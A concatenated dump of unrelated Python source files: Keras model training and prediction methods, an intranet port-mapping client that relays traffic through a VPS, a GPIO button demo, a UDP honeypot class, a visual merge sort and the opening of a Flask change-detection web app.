    '''
    # Normalize the input into a list of arrays matching the model's inputs.
    x = standardize_input_data(x, self.input_names,
                               self.internal_input_shapes,
                               check_batch_dim=False)

    # A stateful model requires the sample count to divide evenly into batches.
    if self.stateful:
        n_samples = x[0].shape[0]
        if n_samples > batch_size and n_samples % batch_size != 0:
            raise Exception('In a stateful network, '
                            'you should only pass inputs with '
                            'a number of samples that can be '
                            'divided by the batch size. Found: ' +
                            str(x[0].shape[0]) + ' samples. '
                            'Batch size: ' + str(batch_size) + '.')

    # Append the learning-phase flag (0. = test mode) when needed.
    if self.uses_learning_phase and type(K.learning_phase()) is not int:
        ins = x + [0.]
    else:
        ins = x

    self._make_predict_function()
    predict_fn = self.predict_function
    return self._predict_loop(predict_fn, ins,
                              batch_size=batch_size, verbose=verbose)
def train_on_batch(self, x, y,
                   sample_weight=None, class_weight=None):
    '''Runs a single gradient update on a single batch of data.

    # Arguments
        x: Numpy array of training data,
            or list of Numpy arrays if the model has multiple inputs.
            If all inputs in the model are named, you can also pass a dictionary
            mapping input names to Numpy arrays.
        y: Numpy array of target data,
            or list of Numpy arrays if the model has multiple outputs.
            If all outputs in the model are named, you can also pass a dictionary
            mapping output names to Numpy arrays.
        sample_weight: optional array of the same length as x, containing
            weights to apply to the model's loss for each sample.
            In the case of temporal data, you can pass a 2D array
            with shape (samples, sequence_length),
            to apply a different weight to every timestep of every sample.
            In this case you should make sure to specify sample_weight_mode="temporal" in compile().
        class_weight: optional dictionary mapping class indices (integers) to
            a weight (float) to apply to the model's loss for the samples
            from this class during training.
            This can be useful to tell the model to "pay more attention" to
            samples from an under-represented class.

    # Returns
        Scalar training loss (if the model has a single output and no metrics)
        or list of scalars (if the model has multiple outputs
        and/or metrics). The attribute `model.metrics_names` will give you
        the display labels for the scalar outputs.
    '''
    # Normalize inputs/targets/weights; batch-dim consistency is enforced here.
    x, y, sample_weights = self._standardize_user_data(
        x, y,
        sample_weight=sample_weight,
        class_weight=class_weight,
        check_batch_dim=True)

    # Feed order: inputs, targets, weights, then learning phase (1. = train mode).
    if self.uses_learning_phase and type(K.learning_phase()) is not int:
        ins = x + y + sample_weights + [1.]
    else:
        ins = x + y + sample_weights

    self._make_train_function()
    outputs = self.train_function(ins)
    # Unwrap a single output for convenience.
    return outputs[0] if len(outputs) == 1 else outputs
def test_on_batch(self, x, y, sample_weight=None):
    '''Test the model on a single batch of samples.

    # Arguments
        x: Numpy array of test data,
            or list of Numpy arrays if the model has multiple inputs.
            If all inputs in the model are named, you can also pass a dictionary
            mapping input names to Numpy arrays.
        y: Numpy array of target data,
            or list of Numpy arrays if the model has multiple outputs.
            If all outputs in the model are named, you can also pass a dictionary
            mapping output names to Numpy arrays.
        sample_weight: optional array of the same length as x, containing
            weights to apply to the model's loss for each sample.
            In the case of temporal data, you can pass a 2D array
            with shape (samples, sequence_length),
            to apply a different weight to every timestep of every sample.
            In this case you should make sure to specify sample_weight_mode="temporal" in compile().

    # Returns
        Scalar test loss (if the model has a single output and no metrics)
        or list of scalars (if the model has multiple outputs
        and/or metrics). The attribute `model.metrics_names` will give you
        the display labels for the scalar outputs.
    '''
    # Normalize inputs/targets/weights; batch-dim consistency is enforced here.
    x, y, sample_weights = self._standardize_user_data(
        x, y,
        sample_weight=sample_weight,
        check_batch_dim=True)

    # Feed order: inputs, targets, weights, then learning phase (0. = test mode).
    if self.uses_learning_phase and type(K.learning_phase()) is not int:
        ins = x + y + sample_weights + [0.]
    else:
        ins = x + y + sample_weights

    self._make_test_function()
    outputs = self.test_function(ins)
    # Unwrap a single output for convenience.
    return outputs[0] if len(outputs) == 1 else outputs
def predict_on_batch(self, x):
    '''Returns predictions for a single batch of samples.
    '''
    # Normalize the input into a list of arrays matching the model's inputs.
    x = standardize_input_data(x, self.input_names,
                               self.internal_input_shapes)

    # Append the learning-phase flag (0. = test mode) when needed.
    if self.uses_learning_phase and type(K.learning_phase()) is not int:
        ins = x + [0.]
    else:
        ins = x

    self._make_predict_function()
    outputs = self.predict_function(ins)
    # Unwrap a single output for convenience.
    return outputs[0] if len(outputs) == 1 else outputs
def fit_generator(self, generator, samples_per_epoch, nb_epoch,
                  verbose=1, callbacks=None,
                  validation_data=None, nb_val_samples=None,
                  class_weight=None, max_q_size=10, nb_worker=1, pickle_safe=False):
    '''Fits the model on data generated batch-by-batch by
    a Python generator.
    The generator is run in parallel to the model, for efficiency.
    For instance, this allows you to do real-time data augmentation
    on images on CPU in parallel to training your model on GPU.

    # Arguments
        generator: a generator.
            The output of the generator must be either
            - a tuple (inputs, targets)
            - a tuple (inputs, targets, sample_weights).
            All arrays should contain the same number of samples.
            The generator is expected to loop over its data
            indefinitely. An epoch finishes when `samples_per_epoch`
            samples have been seen by the model.
        samples_per_epoch: integer, number of samples to process before
            going to the next epoch.
        nb_epoch: integer, total number of iterations on the data.
        verbose: verbosity mode, 0, 1, or 2.
        callbacks: list of callbacks to be called during training.
        validation_data: this can be either
            - a generator for the validation data
            - a tuple (inputs, targets)
            - a tuple (inputs, targets, sample_weights).
        nb_val_samples: only relevant if `validation_data` is a generator.
            number of samples to use from validation generator
            at the end of every epoch.
        class_weight: dictionary mapping class indices to a weight
            for the class.
        max_q_size: maximum size for the generator queue
        nb_worker: maximum number of processes to spin up when using process based threading
        pickle_safe: if True, use process based threading. Note that because
            this implementation relies on multiprocessing, you should not pass
            non picklable arguments to the generator as they can't be passed
            easily to children processes.

    # Returns
        A `History` object.

    # Example

    ```python
        def generate_arrays_from_file(path):
            while 1:
                f = open(path)
                for line in f:
                    # create numpy arrays of input data
                    # and labels, from each line in the file
                    x1, x2, y = process_line(line)
                    yield ({'input_1': x1, 'input_2': x2}, {'output': y})
                f.close()

        model.fit_generator(generate_arrays_from_file('/my_file.txt'),
                            samples_per_epoch=10000, nb_epoch=10)
    ```
    '''
    # Fix: the defaults were mutable (`[]` and `{}`), which are shared across
    # calls and could accumulate state between fit_generator() invocations.
    if callbacks is None:
        callbacks = []
    if class_weight is None:
        class_weight = {}

    wait_time = 0.01  # in seconds; polling interval on the batch queue
    epoch = 0
    do_validation = bool(validation_data)
    self._make_train_function()
    if do_validation:
        self._make_test_function()

    # python 2 has 'next', 3 has '__next__'
    # avoid any explicit version checks
    val_gen = (hasattr(validation_data, 'next') or
               hasattr(validation_data, '__next__'))
    if val_gen and not nb_val_samples:
        raise Exception('When using a generator for validation data, '
                        'you must specify a value for "nb_val_samples".')

    out_labels = self.metrics_names
    callback_metrics = out_labels + ['val_' + n for n in out_labels]

    # prepare callbacks
    self.history = cbks.History()
    callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
    if verbose:
        callbacks += [cbks.ProgbarLogger()]
    callbacks = cbks.CallbackList(callbacks)

    # it's possible to callback a different model than self:
    if hasattr(self, 'callback_model') and self.callback_model:
        callback_model = self.callback_model
    else:
        callback_model = self
    callbacks._set_model(callback_model)
    callbacks._set_params({
        'nb_epoch': nb_epoch,
        'nb_sample': samples_per_epoch,
        'verbose': verbose,
        'do_validation': do_validation,
        'metrics': callback_metrics,
    })
    callbacks.on_train_begin()

    if do_validation and not val_gen:
        # Static validation data: standardize it once up front.
        if len(validation_data) == 2:
            val_x, val_y = validation_data
            val_sample_weight = None
        elif len(validation_data) == 3:
            val_x, val_y, val_sample_weight = validation_data
        else:
            raise Exception('validation_data should be a tuple '
                            '(val_x, val_y, val_sample_weight) '
                            'or (val_x, val_y). Found: ' + str(validation_data))
        val_x, val_y, val_sample_weights = self._standardize_user_data(val_x, val_y, val_sample_weight)
        self.validation_data = val_x + [val_y, val_sample_weights]
    else:
        self.validation_data = None

    # start generator thread storing batches into a queue
    data_gen_queue, _stop = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
                                            pickle_safe=pickle_safe)

    callback_model.stop_training = False
    while epoch < nb_epoch:
        callbacks.on_epoch_begin(epoch)
        samples_seen = 0
        batch_index = 0
        while samples_seen < samples_per_epoch:
            generator_output = None
            # Poll until a batch is available or the stop flag is raised.
            while not _stop.is_set():
                if not data_gen_queue.empty():
                    generator_output = data_gen_queue.get()
                    break
                else:
                    time.sleep(wait_time)

            if not hasattr(generator_output, '__len__'):
                _stop.set()
                raise Exception('output of generator should be a tuple '
                                '(x, y, sample_weight) '
                                'or (x, y). Found: ' + str(generator_output))
            if len(generator_output) == 2:
                x, y = generator_output
                sample_weight = None
            elif len(generator_output) == 3:
                x, y, sample_weight = generator_output
            else:
                _stop.set()
                raise Exception('output of generator should be a tuple '
                                '(x, y, sample_weight) '
                                'or (x, y). Found: ' + str(generator_output))

            # build batch logs
            batch_logs = {}
            if type(x) is list:
                batch_size = x[0].shape[0]
            elif type(x) is dict:
                batch_size = list(x.values())[0].shape[0]
            else:
                batch_size = x.shape[0]
            batch_logs['batch'] = batch_index
            batch_logs['size'] = batch_size
            callbacks.on_batch_begin(batch_index, batch_logs)

            try:
                outs = self.train_on_batch(x, y,
                                           sample_weight=sample_weight,
                                           class_weight=class_weight)
            except:
                # Stop the producer before propagating the error.
                _stop.set()
                raise

            if type(outs) != list:
                outs = [outs]
            for l, o in zip(out_labels, outs):
                batch_logs[l] = o

            callbacks.on_batch_end(batch_index, batch_logs)

            # construct epoch logs
            epoch_logs = {}
            batch_index += 1
            samples_seen += batch_size

            # epoch finished
            if samples_seen > samples_per_epoch:
                warnings.warn('Epoch comprised more than '
                              '`samples_per_epoch` samples, '
                              'which might affect learning results. '
                              'Set `samples_per_epoch` correctly '
                              'to avoid this warning.')
            if samples_seen >= samples_per_epoch and do_validation:
                if val_gen:
                    val_outs = self.evaluate_generator(validation_data,
                                                       nb_val_samples,
                                                       max_q_size=max_q_size)
                else:
                    # no need for try/except because
                    # data has already been validated
                    val_outs = self.evaluate(val_x, val_y,
                                             batch_size=batch_size,
                                             sample_weight=val_sample_weights,
                                             verbose=0)
                if type(val_outs) is not list:
                    val_outs = [val_outs]
                # same labels assumed
                for l, o in zip(out_labels, val_outs):
                    epoch_logs['val_' + l] = o

        callbacks.on_epoch_end(epoch, epoch_logs)
        epoch += 1
        if callback_model.stop_training:
            break

    _stop.set()
    if pickle_safe:
        data_gen_queue.close()
    callbacks.on_train_end()
    return self.history
def evaluate_generator(self, generator, val_samples, max_q_size=10, nb_worker=1, pickle_safe=False):
    '''Evaluates the model on a data generator. The generator should
    return the same kind of data as accepted by `test_on_batch`.

    Arguments:
        generator:
            generator yielding tuples (inputs, targets)
            or (inputs, targets, sample_weights)
        val_samples:
            total number of samples to generate from `generator`
            before returning.
        max_q_size: maximum size for the generator queue
        nb_worker: maximum number of processes to spin up when using process based threading
        pickle_safe: if True, use process based threading. Note that because
            this implementation relies on multiprocessing, you should not pass
            non picklable arguments to the generator as they can't be passed
            easily to children processes.

    # Returns
        Scalar test loss (if the model has a single output and no metrics)
        or list of scalars (if the model has multiple outputs
        and/or metrics). The attribute `model.metrics_names` will give you
        the display labels for the scalar outputs.
    '''
    self._make_test_function()

    processed_samples = 0
    wait_time = 0.01  # seconds; polling interval on the batch queue
    all_outs = []     # per-batch outputs from test_on_batch
    weights = []      # per-batch sample counts, used to weight the average

    # Producer side: worker thread(s)/process(es) fill the queue with batches.
    data_gen_queue, _stop = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
                                            pickle_safe=pickle_safe)

    # NOTE(review): if val_samples <= 0 the loop never runs and `outs` below is
    # unbound (NameError) — confirm callers always pass a positive count.
    while processed_samples < val_samples:
        generator_output = None
        # Poll until a batch is available or the stop flag is raised.
        while not _stop.is_set():
            if not data_gen_queue.empty():
                generator_output = data_gen_queue.get()
                break
            else:
                time.sleep(wait_time)

        if not hasattr(generator_output, '__len__'):
            _stop.set()
            raise Exception('output of generator should be a tuple '
                            '(x, y, sample_weight) '
                            'or (x, y). Found: ' + str(generator_output))
        if len(generator_output) == 2:
            x, y = generator_output
            sample_weight = None
        elif len(generator_output) == 3:
            x, y, sample_weight = generator_output
        else:
            _stop.set()
            raise Exception('output of generator should be a tuple '
                            '(x, y, sample_weight) '
                            'or (x, y). Found: ' + str(generator_output))

        try:
            outs = self.test_on_batch(x, y, sample_weight=sample_weight)
        except:
            # Stop the producer before propagating the error.
            _stop.set()
            raise

        # Determine how many samples this batch contained.
        if type(x) is list:
            nb_samples = len(x[0])
        elif type(x) is dict:
            nb_samples = len(list(x.values())[0])
        else:
            nb_samples = len(x)
        all_outs.append(outs)

        processed_samples += nb_samples
        weights.append(nb_samples)

    _stop.set()
    if pickle_safe:
        data_gen_queue.close()
    # Average the per-batch results, weighted by each batch's sample count.
    if type(outs) is not list:
        return np.average(np.asarray(all_outs),
                          weights=weights)
    else:
        averages = []
        for i in range(len(outs)):
            averages.append(np.average([out[i] for out in all_outs],
                                       weights=weights))
        return averages
def predict_generator(self, generator, val_samples, max_q_size=10, nb_worker=1, pickle_safe=False):
    '''Generates predictions for the input samples from a data generator.
    The generator should return the same kind of data as accepted by
    `predict_on_batch`.

    # Arguments
        generator: generator yielding batches of input samples.
        val_samples: total number of samples to generate from `generator`
            before returning.
        max_q_size: maximum size for the generator queue
        nb_worker: maximum number of processes to spin up when using process based threading
        pickle_safe: if True, use process based threading. Note that because
            this implementation relies on multiprocessing, you should not pass
            non picklable arguments to the generator as they can't be passed
            easily to children processes.

    # Returns
        Numpy array(s) of predictions.
    '''
    self._make_predict_function()

    processed_samples = 0
    wait_time = 0.01  # seconds; polling interval on the batch queue
    all_outs = []     # pre-allocated output arrays, one per model output

    # Producer side: worker thread(s)/process(es) fill the queue with batches.
    data_gen_queue, _stop = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
                                            pickle_safe=pickle_safe)

    while processed_samples < val_samples:
        generator_output = None
        # Poll until a batch is available or the stop flag is raised.
        while not _stop.is_set():
            if not data_gen_queue.empty():
                generator_output = data_gen_queue.get()
                break
            else:
                time.sleep(wait_time)

        # The generator may yield bare inputs, or (x, y[, sample_weight])
        # tuples; targets and weights are ignored for prediction.
        if isinstance(generator_output, tuple):
            if len(generator_output) == 2:
                x, y = generator_output
                sample_weight = None
            elif len(generator_output) == 3:
                x, y, sample_weight = generator_output
            else:
                _stop.set()
                raise Exception('output of generator should be a tuple '
                                '(x, y, sample_weight) '
                                'or (x, y). Found: ' + str(generator_output))
        else:
            x = generator_output

        try:
            outs = self.predict_on_batch(x)
        except:
            # Stop the producer before propagating the error.
            _stop.set()
            raise

        # Determine how many samples this batch contained.
        if type(x) is list:
            nb_samples = len(x[0])
        elif type(x) is dict:
            nb_samples = len(list(x.values())[0])
        else:
            nb_samples = len(x)

        if type(outs) != list:
            outs = [outs]

        # Lazily allocate the full output arrays once the first batch reveals
        # each output's trailing shape.
        if len(all_outs) == 0:
            for out in outs:
                shape = (val_samples,) + out.shape[1:]
                all_outs.append(np.zeros(shape, dtype=K.floatx()))

        # Copy this batch's predictions into the corresponding slice.
        for i, out in enumerate(outs):
            all_outs[i][processed_samples:(processed_samples + nb_samples)] = out
        processed_samples += nb_samples

    _stop.set()
    if pickle_safe:
        data_gen_queue.close()
    if len(all_outs) == 1:
        return all_outs[0]
    return all_outs
|
InternalMain.py | '''
@desc:内网穿透(映射)客户端 部署在内网
@author: Martin Huang
@time: created on 2019/6/14 20:43
@修改记录:
2019/07/12 => 增加DEBUG选项 默认False 改为True可显示更多信息
'''
import select
import socket
import time
from threading import Thread
from Utils.ConversionUtils import ConversionUtils
#pycharm
#from src.main.Utils.IOUtils import *
#调试参数
DEBUG = False
class MappingClient:
    # Intranet-side port-mapping client: bridges a local service (clientA)
    # and a remote VPS relay (clientB), forwarding bytes in both directions.
    def __init__(self,fromIP,fromPort,type,remoteIp,remotePort):
        # IP address of the remote VPS
        self.remoteIp = remoteIp
        # Data port the remote VPS listens on
        self.remotePort = remotePort
        # Source / local IP
        self.fromIP = fromIP
        # Source / local port
        self.fromPort = fromPort
        # clientA -> connects to the intranet application
        self.clientA = None
        # clientB -> connects to the VPS
        self.clientB = None
        # Readable sockets watched by select()
        self.readableList = []
        # Protocol type (only TCP is implemented here)
        self.type = type

    # Connect to the intranet application
    def connectClientA(self):
        if not self.clientA:
            self.clientA = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.clientA.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
            self.clientA.connect((self.fromIP,self.fromPort))
            print('clientA Connected!')
            # Register clientA with the select() readable list
            self.readableList.append(self.clientA)

    # Connect to the VPS
    def connectClientB(self):
        if not self.clientB:
            self.clientB = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.clientB.setsockopt(socket.SOL_SOCKET,socket.SO_KEEPALIVE,1)
            self.clientB.connect((self.remoteIp, self.remotePort))
            print('clientB Connected!')
            # Register clientB with the select() readable list
            self.readableList.append(self.clientB)

    # Close clientA
    def closeClintA(self):
        # Remove clientA from the select() list before shutting it down,
        # otherwise select() would raise on the dead socket; same for clientB.
        if self.clientA in self.readableList:
            self.readableList.remove(self.clientA)
            self.clientA.shutdown(2)
            self.clientA = None
            print('ClintA Closed!')

    def closeClintB(self):
        if self.clientB in self.readableList:
            self.readableList.remove(self.clientB)
            self.clientB.shutdown(2)
            self.clientB = None
            print('ClintB Closed!')

    # Port mapping: pump bytes between clientA and clientB until either side closes
    def TCPMapping(self):
        # Connect to the intranet app and to the external VPS
        self.connectClientA()
        self.connectClientB()
        while True:
            # Block until at least one socket is readable
            rs, ws, es = select.select(self.readableList, [], [])
            for each in rs:
                # Data readable on clientA: forward it to clientB;
                # on error or EOF, tear the connection down
                if each == self.clientA:
                    try:
                        tdataA = each.recv(1024)
                        self.clientB.send(tdataA)
                    except ConnectionResetError as e:
                        if DEBUG:
                            print(e)
                        self.closeClintA()
                        # NOTE(review): clientB stays open on this path — confirm
                        # whether it should also be closed here.
                        return
                    #print(tdataA)
                    if not tdataA:
                        # Empty read means the local app closed the connection
                        if self.clientA is not None:
                            self.closeClintA()
                        self.closeClintB()
                        return
                # Data readable on clientB: forward it to clientA;
                # on error or EOF, tear the connection down
                elif each == self.clientB:
                    try:
                        tdataB = each.recv(1024)
                        self.clientA.send(tdataB)
                    except ConnectionResetError:
                        self.closeClintA()
                        return
                    #print(tdataB)
                    # Sentinel from the VPS meaning the external user
                    # disconnected unexpectedly: close both sides and finish
                    if tdataB == bytes('NODATA',encoding='utf-8'):
                        self.closeClintA()
                        self.closeClintB()
                        return
                    if not tdataB:
                        self.closeClintA()
                        self.closeClintB()
                        return
#主方法
def InternalMain(remoteIP,commonPort,remotePort,localIp,localPort):
    """Main loop of the intranet client.

    Keeps a heartbeat connection (clientC) to the VPS and, on an ACTIVATE
    command, spawns a daemon thread running a MappingClient that bridges
    the local service to the VPS data port.

    # Arguments
        remoteIP: IP address of the remote VPS.
        commonPort: heartbeat/control port on the VPS.
        remotePort: data port the VPS listens on.
        localIp: IP of the local (intranet) service.
        localPort: port of the local (intranet) service.
    """
    def _connect_heartbeat():
        # Build a fresh keep-alive control socket. A closed socket object
        # cannot be reconnected, so reconnection always creates a new one.
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
        s.connect((remoteIP, commonPort))
        return s

    # clientC is dedicated to heartbeats with the remote VPS
    clientC = _connect_heartbeat()
    rl = [clientC]
    # Control loop
    while True:
        rs, ws, es = select.select(rl, [], [])
        for each in rs:
            if each == clientC:
                tdataC = each.recv(1024)
                if not tdataC:
                    # Server closed the heartbeat connection: rebuild it.
                    # Fix: the original called connect() on the already-closed
                    # socket, which raises OSError; a new socket is required.
                    clientC.close()
                    clientC = _connect_heartbeat()
                    rl = [clientC]
                    break
                if DEBUG:
                    print(tdataC)
                # The VPS received an external user request: acknowledge and
                # start a mapping thread to serve it.
                if tdataC == bytes('ACTIVATE',encoding='utf-8'):
                    b = bytes('OK', encoding='utf-8')
                    each.send(b)
                    foo = MappingClient(localIp,localPort,'tcp',remoteIP,remotePort)
                    t = Thread(target=foo.TCPMapping)
                    # Fix: Thread.setDaemon() is deprecated; assign the attribute.
                    t.daemon = True
                    t.start()
                # Heartbeat probe: reply OK
                elif tdataC == bytes('IAMALIVE',encoding='utf-8'):
                    b = bytes('OK', encoding='utf-8')
                    each.send(b)
buttonthread.py | # -*- coding: utf-8 -*-
# Copyright (c) 2018 Steven P. Goldsmith
# See LICENSE.md for details.
"""
Use a thread to monitor edge events in background
-------------
Should work on any board with a button built in. Just change chip and line
value as needed.
"""
import sys, time, threading, gpiod
from argparse import *
class buttonthread:
    """Monitor GPIO edge events on a background thread while the main
    thread keeps doing other work.
    """

    def __init__(self, chip):
        """Initialize GPIO chip.
        """
        self.chip = gpiod.Chip(chip, gpiod.Chip.OPEN_BY_NUMBER)

    def wait_for_edge(self, line, timeoutSecs):
        """Print each edge event on `line` until `timeoutSecs` elapses
        with no event.
        """
        print("Thread start")
        button_line = self.chip.get_line(line)
        # Consumer name = script file name without the ".py" suffix.
        button_line.request(consumer=sys.argv[0][:-3], type=gpiod.LINE_REQ_EV_BOTH_EDGES)
        while button_line.event_wait(sec=timeoutSecs):
            event = button_line.event_read()
            if event.type == gpiod.LineEvent.RISING_EDGE:
                print("Rising edge timestamp %s" % time.strftime('%m/%d/%Y %H:%M:%S', time.localtime(event.sec)))
            elif event.type == gpiod.LineEvent.FALLING_EDGE:
                print("Falling edge timestamp %s" % time.strftime('%m/%d/%Y %H:%M:%S', time.localtime(event.sec)))
            else:
                raise TypeError('Invalid event type')
        print("Thread exit")

    def main(self, line):
        """Use thread to wait for edge events while main method does other stuff.
        """
        print("Name: %s, label: %s, lines: %d" % (self.chip.name(), self.chip.label(), self.chip.num_lines()))
        # Kick off thread
        thread = threading.Thread(target=self.wait_for_edge, args=(line, 15,))
        thread.start()
        count = 0
        # Just simulating main program doing something else.
        # Fix: Thread.isAlive() was removed in Python 3.9; use is_alive().
        while count < 30 and thread.is_alive():
            print("Main program doing stuff, press button")
            time.sleep(1)
            count += 1
        # If thread is still alive wait for it to time out
        if thread.is_alive():
            print("Waiting for thread to exit, stop pressing button for 5 seconds")
            thread.join()
if __name__ == "__main__":
    # CLI entry point: parse chip/line numbers and run the edge-monitor demo.
    parser = ArgumentParser()
    parser.add_argument("--chip", help="GPIO chip number (default 1 '/dev/gpiochip1')", type=str, default="1")
    parser.add_argument("--line", help="GPIO line number (default 3 button on NanoPi Duo)", type=int, default=3)
    args = parser.parse_args()
    obj = buttonthread(args.chip)
    obj.main(args.line)
|
genericpot.py | #!/usr/bin/env python3
import os
import signal
import threading
from . import generic
import core.potloader as potloader
import core.utils as utils
from .dblogger import DBThread
class GenericPot(potloader.PotLoader):
    """ Implementation of generic honeypot that listens on an arbitrary UDP port
    and responds with a random response of a given size or with a predefined pattern.
    """

    def name(self):
        """Honeypot identifier, used for logging and DB lookups."""
        return 'generic'

    def _create_server(self):
        """Build the server instance from this pot's configuration."""
        return generic.create_server(
            self.conf,
            self.name(),
            self.log_queue,
            self.output_queue,
            self.hpfeeds_client,
            self.alerter
        )

    def _create_dbthread(self, dbfile, new_attack_interval):
        """Build the database-logger thread for this pot."""
        return DBThread(
            dbfile,
            self.name(),
            self.log_queue,
            self.output_queue,
            self.stop_event,
            new_attack_interval
        )

    def _start_server(self):
        """Blocking serve loop; intended to run on a worker thread."""
        self.server.serve_forever()

    def _get_config_path(self):
        """Path to the pot's config file, located next to this module."""
        return os.path.join(os.path.dirname(__file__), 'genericpot.conf')

    def _detailed_status(self, status):
        """Format pot-specific statistic rows for the status display.

        Fix: removed an unused local (`port`) that was assigned but never read.
        """
        avg_amp = float('{0:.2f}'.format(status['avg_amp']))
        pkt_in_bytes = utils.format_unit(status['packets_in_bytes'])
        stats = [
            ['Average amplification', utils.sep_thousand(avg_amp)],
            ['Traffic IN/OUT', pkt_in_bytes],
        ]
        return stats

    # override of default function for obtaining payload inside status structure
    # setup function is generic enough for display, but since generic honeypot is
    # port-specific, return structure for the currently bound port
    def _extract_status_payload(self, stats):
        port = self.server.server_address[1]
        payload = stats['payload']
        if port in payload:
            port_stats = payload[port]
            specific = payload['specific']
            port_stats['specific'] = {
                'avg_amp': specific['avg_amp'][port],
                'packets_in_bytes': specific['packets_in_bytes'][port]
            }
            return port_stats
        else:
            utils.print_warn('Port %d not found in the database, statistics not available' % (port))
            # set total_attacks parameter to zero in order to signal empty statistics table
            return {'total_attacks': 0}
if __name__ == "__main__":
    # Stand-alone entry point: run the honeypot on a worker thread and
    # block until SIGINT triggers a graceful shutdown.
    genericpot = GenericPot()
    genericpot.setup()
    t = threading.Thread(target=genericpot.run)
    t.start()
    genericpot.potthread = t
    signal.signal(signal.SIGINT, genericpot.shutdown_signal_wrapper)
    signal.pause()
|
MergeSort.py | from Algorithims import Algorithms
import time
import threading
class MergeSort(Algorithms):
    """Merge sort with step-by-step visualization: sorting runs on a daemon
    thread and redraws the data after each merge step.
    """

    def __init__(self, data, delay):
        Algorithms.__init__(self)
        self.data = data
        self.delay = delay
        # Sort on a background thread so the UI main loop stays responsive.
        sorting_thread = threading.Thread(target=self.sort, args=(self.data, self.drawData, self.delay))
        sorting_thread.daemon = True
        sorting_thread.start()
        self.mainloop()

    def sort(self, data, drawData, delay):
        """Sort `data` in place, then draw everything green and print it."""
        self.algorithm(data, 0, len(data) - 1, drawData, delay)
        drawData(data, ["green" for x in range(len(data))])
        # Fix: `print data` is Python-2-only syntax; use the function form.
        print(data)

    def algorithm(self, data, left, right, drawData, delay):
        """Recursively sort data[left..right] (inclusive)."""
        if left < right:
            middle = (left + right) // 2
            self.algorithm(data, left, middle, drawData, delay)
            self.algorithm(data, middle + 1, right, drawData, delay)
            self.merge(data, left, middle, right, drawData, delay)

    def merge(self, data, left, middle, right, drawData, delay):
        """Merge the two sorted halves data[left..middle] and data[middle+1..right]."""
        drawData(data, self.getColorArray(len(data), left, middle, right))
        time.sleep(delay)
        # left partition
        left_partition = data[left: middle + 1]
        # right partition
        right_partition = data[middle + 1: right + 1]
        left_index = 0
        right_index = 0
        for data_index in range(left, right + 1):
            if left_index < len(left_partition) and right_index < len(right_partition):
                if left_partition[left_index] <= right_partition[right_index]:
                    data[data_index] = left_partition[left_index]
                    left_index += 1
                else:
                    data[data_index] = right_partition[right_index]
                    right_index += 1
            elif left_index < len(left_partition):
                data[data_index] = left_partition[left_index]
                left_index += 1
            else:
                data[data_index] = right_partition[right_index]
                # Fix: this branch incremented left_index, so the same right
                # element was copied repeatedly and the tail of the right
                # partition was lost; advance right_index instead.
                right_index += 1
        drawData(data, ["green" if x >= left and x <= right else "white" for x in range(len(data))])
        time.sleep(delay)

    def getColorArray(self, length, left, middle, right):
        """Color map for the current merge: yellow = left half, red = right
        half, white = untouched elements."""
        color_array = []
        for i in range(length):
            if i >= left and i <= right:
                if i >= left and i <= middle:
                    color_array.append("yellow")
                else:
                    color_array.append("red")
            else:
                color_array.append("white")
        return color_array
# Test this tonight |
__init__.py | #!/usr/bin/python3
# @todo logging
# @todo extra options for url like , verify=False etc.
# @todo enable https://urllib3.readthedocs.io/en/latest/user-guide.html#ssl as option?
# @todo option for interval day/6 hour/etc
# @todo on change detected, config for calling some API
# @todo make tables responsive!
# @todo fetch title into json
# https://distill.io/features
# proxy per check
# - flask_cors, itsdangerous,MarkupSafe
import time
import os
import timeago
import threading
from threading import Event
import queue
from flask import Flask, render_template, request, send_file, send_from_directory, abort, redirect, url_for
from feedgen.feed import FeedGenerator
from flask import make_response
import datetime
import pytz
# Shared datastore handle; injected by changedetection_app() at startup.
datastore = None

# Local
# Worker threads currently fetching/processing watches (each exposes current_uuid).
running_update_threads = []
ticker_thread = None

messages = []
extra_stylesheets = []

# Queue of watch UUIDs awaiting an update check.
update_q = queue.Queue()

# NOTE(review): "backen" in the static path looks like a typo for "backend" —
# confirm against the deployment layout before changing.
app = Flask(__name__, static_url_path="/var/www/change-detection/backen/static")

# Stop browser caching of assets
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
# Event used to signal application shutdown to background threads.
app.config.exit = Event()
app.config['NEW_VERSION_AVAILABLE'] = False

# Disables caching of the templates
app.config['TEMPLATES_AUTO_RELOAD'] = True
# We use the whole watch object from the store/JSON so we can see if there's some related status in terms of a thread
# running or something similar.
@app.template_filter('format_last_checked_time')
def _jinja2_filter_datetime(watch_obj, format="%Y-%m-%d %H:%M:%S"):
    """Template filter: human-friendly 'last checked' text for a watch."""
    # A worker thread advertises the UUID it is currently processing.
    if any(t.current_uuid == watch_obj['uuid'] for t in running_update_threads):
        return "Checking now.."
    # A zero timestamp means the watch has never been checked.
    if watch_obj['last_checked'] == 0:
        return 'Not yet'
    return timeago.format(int(watch_obj['last_checked']), time.time())
# @app.context_processor
# def timeago():
# def _timeago(lower_time, now):
# return timeago.format(lower_time, now)
# return dict(timeago=_timeago)
@app.template_filter('format_timestamp_timeago')
def _jinja2_filter_datetimestamp(timestamp, format="%Y-%m-%d %H:%M:%S"):
    # Template filter: render a unix timestamp as relative time ("3 minutes ago").
    # `format` is accepted for template compatibility but is not used.
    return timeago.format(timestamp, time.time())
def changedetection_app(config=None, datastore_o=None):
global datastore
datastore = datastore_o
app.config.update(dict(DEBUG=True))
app.config.update(config or {})
# Setup cors headers to allow all domains
# https://flask-cors.readthedocs.io/en/latest/
# CORS(app)
# https://github.com/pallets/flask/blob/93dd1709d05a1cf0e886df6223377bdab3b077fb/examples/tutorial/flaskr/__init__.py#L39
# You can divide up the stuff like this
@app.route("/", methods=['GET'])
def index():
global messages
limit_tag = request.args.get('tag')
pause_uuid = request.args.get('pause')
if pause_uuid:
try:
datastore.data['watching'][pause_uuid]['paused'] ^= True
datastore.needs_write = True
return redirect(url_for('index', tag = limit_tag))
except KeyError:
pass
# Sort by last_changed and add the uuid which is usually the key..
sorted_watches = []
